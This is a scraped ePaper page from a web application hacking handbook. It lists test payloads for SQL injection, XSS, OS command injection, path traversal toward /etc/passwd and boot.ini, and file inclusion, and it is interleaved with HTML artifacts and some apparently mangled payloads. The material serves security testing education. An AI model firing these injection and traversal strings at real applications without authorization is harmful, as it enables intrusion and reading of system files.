19.09.2017 Views

the-web-application-hackers-handbook

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

Chapter 21 n A Web Application Hacker’s Methodology 825<br />

SQL Injection<br />

and generate a prohibitively large amount of output for you to review.<br />

Hence, a sensible approach is to target a range of common vulnerabilities<br />

that can often be easily detected in anomalous responses to specific<br />

crafted inputs and that often manifest <strong>the</strong>mselves anywhere within<br />

<strong>the</strong> <strong>application</strong> ra<strong>the</strong>r than within specific types of functionality. Here<br />

is a suitable set of payloads that you can use to test for some common<br />

categories of vulnerabilities:<br />

‘<br />

‘--<br />

‘; waitfor delay ‘0:30:0’--<br />

1; waitfor delay ‘0:30:0’--<br />

XSS and Header Injection<br />

xsstest<br />

“>alert(‘xss’)<br />

OS Command Injection<br />

Path Traversal<br />

|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &<br />

| ping –i 30 127.0.0.1 |<br />

| ping –n 30 127.0.0.1 |<br />

& ping –i 30 127.0.0.1 &<br />

& ping –n 30 127.0.0.1 &<br />

; ping 127.0.0.1 ;<br />

%0a ping –i 30 127.0.0.1 %0a<br />

` ping 127.0.0.1 `<br />

../../../../../../../../../../etc/passwd<br />

../../../../../../../../../../boot.ini<br />

..\..\..\..\..\..\..\..\..\..\etc\passwd<br />

..\..\..\..\..\..\..\..\..\..\boot.ini<br />

Script Injection<br />

File Inclusion<br />

;echo 111111<br />

echo 111111<br />

response.write 111111<br />

:response.write 111111<br />

http:///<br />

http:///<br />

7.1.4 All <strong>the</strong> preceding payloads are shown in <strong>the</strong>ir literal form. The characters<br />

?, ;, &, +, =, and space need to be URL-encoded because <strong>the</strong>y have special

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!